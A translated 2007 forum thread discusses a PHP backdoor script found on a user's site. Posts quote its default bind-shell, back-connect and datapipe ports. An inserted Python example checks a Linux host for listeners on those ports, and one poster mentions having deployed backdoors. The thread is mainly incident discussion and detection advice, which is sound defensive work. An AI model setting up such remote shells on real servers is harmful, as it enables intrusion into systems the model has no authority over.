No reason it would, unless the antivirus has signatures for PHP code.
 
Now, given how you talk about it, I'm not sure you really understand the execution environment of a PHP script served by an HTTP server :)

Reply

Posted on 03-12-2007 at 00:44:15

wind128, if you put the script on your own site, send us your website's address so we can see whether it works properly   :wahoo:

Reply

Posted on 06-12-2007 at 09:05:42

Reply

Posted on 06-12-2007 at 18:53:03

PierreC wrote:

wind128, if you put the script on your own site, send us your website's address so we can see whether it works properly   :wahoo:


That's very kind of you  :ange:

Reply

Posted on 06-12-2007 at 20:50:14

A great script for browsing everything, including the PC's files and the system information if the exec function isn't disabled. In short, enough to pull off a heist on the machine.
 
I have found worms for joining botnets several times, but the pirates take such care not to get hacked themselves that it's almost undecipherable.


Message edited by czh on 06-12-2007 at 20:53:11
Reply

Posted on 07-12-2007 at 16:03:41

Hello
To come back to the beginning of your message, you just need to go and see the gendarmerie, because this is purely and simply an act of hacking... filing a complaint against X (person unknown) in principle, but don't worry, they will find them... (my signature may confirm that for you)


---------------
http://www.ypikay.com
Reply

Posted on 13-12-2007 at 19:32:58

There is still a "shady" area in the first source; wouldn't there be a bindshell on port 8081, by any chance?
Check on your server just in case.
 
Unlikely to be the case; in my opinion this kind of thing needs exec rights, which you obviously don't have on shared hosting. If you're on a dedicated server, then only you know the answer ;)
 
EDIT: you don't have just one port to check...

Code:
  1. $bindport_port = "31373"; // default port for binding
  2. $bc_port = "31373"; // default port for back-connect
  3. $datapipe_localport = "8081"; // default port for datapipe


Check that you don't have one of these ports in LISTENING..


Message edited by ZePRiNCE on 13-12-2007 at 19:36:49

---------------
FOR SALE: Razer Chroma ARGB Controller / Case / Triple Screen Stand / CPU Cooler / USB3 Card
Reply
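The check suggested in the post above, as an added example that is not part of the thread: it reads the Linux `/proc/net/tcp` tables and reports whether any of the three default ports quoted there is in LISTEN state. The function names and the sample table are constructed for this example; only the port numbers and variable names come from the post.

```python
# Default ports quoted in the post above, keyed to the variables that set them.
SUSPECT_PORTS = {
    31373: "bindport_port / bc_port default",
    8081: "datapipe_localport default",
}
TCP_LISTEN = "0A"  # state code for LISTEN in the "st" column of /proc/net/tcp


def listening_ports(proc_net_tcp_text):
    """Return the set of local TCP ports in LISTEN state from /proc/net/tcp text."""
    ports = set()
    for line in proc_net_tcp_text.splitlines()[1:]:  # first line is the header
        fields = line.split()
        if len(fields) < 4 or fields[3] != TCP_LISTEN:
            continue
        # local_address is HEXIP:HEXPORT; rsplit also copes with tcp6 addresses
        ports.add(int(fields[1].rsplit(":", 1)[1], 16))
    return ports


def suspect_listeners(proc_net_tcp_text):
    """Map each suspect port that is listening to the reason it is on the list."""
    open_ports = listening_ports(proc_net_tcp_text)
    return {p: why for p, why in SUSPECT_PORTS.items() if p in open_ports}


def check_host(paths=("/proc/net/tcp", "/proc/net/tcp6")):
    """Run the check against the live Linux tables; missing files are skipped."""
    found = {}
    for path in paths:
        try:
            with open(path) as fh:
                found.update(suspect_listeners(fh.read()))
        except OSError:
            continue
    return found


# Constructed sample in /proc/net/tcp layout: listeners on 80 and 31373,
# plus an ESTABLISHED connection whose local port is 8081 (must not match).
SAMPLE = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1001 1
   1: 00000000:7A8D 00000000:0000 0A 00000000:00000000 00:00000000 00000000    33        0 1002 1
   2: 0100007F:1F91 0100007F:C350 01 00000000:00000000 00:00000000 00000000    33        0 1003 1
"""

if __name__ == "__main__":
    print("sample:", suspect_listeners(SAMPLE))
    print("this host:", check_host())
```

These are only the defaults the post quotes, so an empty result for them says nothing about listeners on other ports; compare the full output of `listening_ports` against the services the server is supposed to run.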

Posted on 14-12-2007 at 00:18:59

And how do you test the script without having to delete the 1000 line numbers in Notepad?


Message edited by grosbin on 14-12-2007 at 00:19:22

---------------
Panoramic Photos Mountains Haute Savoie
Reply

Posted on 14-12-2007 at 06:52:02

Notepad++ -> Delete the line numbers, if I'm not mistaken.

Message quoted 1 time
Message edited by bapho13 on 14-12-2007 at 06:52:11
Reply

Posted on 14-12-2007 at 09:24:45

Didn't find it, but I find the script ordinary; I have already deployed backdoors that I never used


---------------
Panoramic Photos Mountains Haute Savoie
Reply

Posted on 14-12-2007 at 09:43:22

Or use a real browser which, when you select the text in the code area, doesn't select the line numbers.
Or, simpler, "quote" the message in a reply. You can then select all the code without any hassle.
 
Honestly, :pfff:


---------------
Kao ..98 - Uplay (R6S) : kao98.7.62x39 - Origin (BF4, BF1) : kntkao98
Reply

Posted on 14-12-2007 at 10:23:15


Or hit "reply" on the post and grab directly what is between the [code] tags...
 
-- Grmpf, beaten to it in fact --


Message edited by MagicBuzz on 14-12-2007 at 10:23:52
Reply

Posted on 14-12-2007 at 10:48:14

Never knew that, that's nice :)


---------------
Panoramic Photos Mountains Haute Savoie
Reply
